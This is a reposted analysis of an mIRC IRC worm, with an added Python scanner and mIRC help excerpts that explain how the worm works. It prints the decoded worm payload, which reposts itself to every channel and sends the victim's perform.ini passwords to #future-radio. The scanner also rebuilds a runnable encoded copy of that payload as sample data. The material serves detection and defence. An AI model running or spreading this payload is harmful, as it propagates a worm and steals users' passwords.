
[Repost] Analysis of an IRC worm

Source: securityfocus

I call it PerformPlayer.

irc worm:
<nickname> ROFL! //echo -a $($decode(JGZ-...-uaSk=,m),2),0)

This is what it looks like once decoded:

$findfile(.,*,1,scid -at1 .amsg ROFL! $!cb(1) | .play #future-radio perform.ini)

The file it finds gets echoed to the active window, and two commands get executed:

1) send the malicious code (still on the clipboard) to all channels on all connected networks as a "funny" message
2) play your perform.ini (which may contain your nick/channel passwords) to #future-radio

Perform.ini:
this file contains the commands that are automatically executed at startup of mIRC, typically your identification passwords,

for example:
[perform]
n0=Other Networks,/msg nickserv identify mynick mypassword

Advice:
Forbid #future-radio, and ban spammers who post // $decode() links.

Remark:
this worm leaves no traces and only spreads once, so no "on join" events or anything else get written to a text file.
It cannot be stopped by turning off mIRC remotes.
This worm can only be detected by monitoring the clipboard
(which should be done for every // $decode() link).
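As an added illustration of the detection advice above (this is not part of the securityfocus post, and it is Python rather than mIRC script), the following scanner reads IRC log lines, picks out `//echo ... $decode(<base64>,m)` commands, decodes the base64 payload the way mIRC's `m` (MIME) flag would, and flags payloads that contain the spreading and perform.ini-leaking commands the post decodes. The sample log lines are constructed; the worm line is rebuilt by base64-encoding the decoded command the post shows, since the original encoded string is truncated on this page. Token names and the verdict labels are choices made for this example.

```python
import base64
import binascii
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Substrings that, in a decoded payload, indicate the behaviour described in the post:
# re-spreading the clipboard contents on every connection and playing perform.ini to a channel.
SUSPICIOUS_TOKENS = ("$cb(", "$!cb(", "scid -a", ".amsg", ".play", "perform.ini", "$findfile(")

# A "//" command that evaluates $decode(<base64>,m) and echoes the result.
DECODE_CMD = re.compile(
    r"//\s*echo\b[^\n]*\$decode\(\s*([A-Za-z0-9+/=]+)\s*,\s*m\s*\)",
    re.IGNORECASE,
)


@dataclass
class Finding:
    line: str
    encoded: str
    decoded: Optional[str]
    tokens: List[str] = field(default_factory=list)

    @property
    def verdict(self) -> str:
        # A $decode link that cannot be decoded is still worth a look; one that
        # decodes to the commands from the post is treated as worm-like.
        if self.decoded is None:
            return "suspicious-undecodable"
        return "worm-like" if self.tokens else "decode-link"


def decode_mime(encoded: str) -> Optional[str]:
    """Decode base64 as mIRC's $decode(text,m) would; None if it is not valid base64 text."""
    try:
        raw = base64.b64decode(encoded, validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        return raw.decode("utf-8")
    except UnicodeDecodeError:
        return None


def inspect_line(line: str) -> Optional[Finding]:
    """Return a Finding for a line carrying a $decode echo command, else None."""
    match = DECODE_CMD.search(line)
    if not match:
        return None
    encoded = match.group(1)
    decoded = decode_mime(encoded)
    tokens = [t for t in SUSPICIOUS_TOKENS if decoded is not None and t in decoded]
    return Finding(line=line, encoded=encoded, decoded=decoded, tokens=tokens)


def scan(lines: List[str]) -> List[Finding]:
    return [f for f in map(inspect_line, lines) if f is not None]


# Constructed sample data: the decoded command from the post, re-encoded here so
# the example runs offline, plus a harmless $decode link and an undecodable one.
PAYLOAD = "$findfile(.,*,1,scid -at1 .amsg ROFL! $!cb(1) | .play #future-radio perform.ini)"
WORM_LINE = "<nickname> ROFL! //echo -a $($decode(%s,m),2),0)" % (
    base64.b64encode(PAYLOAD.encode()).decode()
)
SAMPLE_LOG = [
    "<alice> hey, anyone up for a game?",
    WORM_LINE,
    "<bob> //echo -a $($decode(aGVsbG8gd29ybGQ=,m),2),0)",  # decodes to "hello world"
    "<carol> //echo -a $($decode(QQ,m),2),0)",              # bad base64 padding
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding.verdict, finding.tokens, repr(finding.decoded))
```

Running this over a real log would be a first pass only: the post's point is that the payload sits on the clipboard and executes as soon as a user pastes the `//` line, so the scanner catches the spam as it arrives in channel, not the execution itself.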


// extracted from the mIRC help:

$findfile(dir,wildcard,N,depth,@window | command)
Searches the specified directory and its subdirectories for the Nth filename matching the wildcard file specification and returns the full path and filename if it is found.

Properties: shortfn

$findfile(c:\mirc,*.exe,1)  returns c:\mirc\mirc.exe

If you specify a custom @window name (with a listbox) instead of the N parameter, mIRC will fill the custom @window listbox with the results.

If you specify a command, the command is performed on every filename that is found. You can use $1- to refer to the filename, eg.

//echo 1 $findfile($mircdir,*.*,0,echo $1-)

If you specify a depth, mIRC will only search N directories deep for matching filenames.

Note: Both the depth and @window/command parameters are optional.

Scripts can be made to perform commands on specific server connections by using /scid and /scon.

*******
/scid <-rsatM | N> [command]
Changes the active connection for a script to connection id N, where N is a $cid value.

All commands after the /scid command will be performed on the new connection id.

The -r switch resets the connection id to the original id for that script.

If you specify the command parameter, the connection id is set only for that command.

The /scon command works in exactly the same way, except that N represents the Nth connection, not a connection id value.

The -a and -tM switches can only be used if you specify a command.

The -a switch performs the command on all connection ids.

The -tM switch limits the command to being performed only on servers with a certain connection status, where M is an or'd value of 1 = server connected, 2 = not connected, 4 = connecting, 8 = not connecting. The command is only performed if M matches the connect status of the connection id.

The -s switch makes any called commands or identifiers show their results.

Note: If you use a command that contains $identifiers, and you want the identifiers to be evaluated in the target connection, you must pass them as $!identifier to prevent them from being evaluated first in the current connection.
*******
$cb(1)    returns line 1 from the clipboard
*******
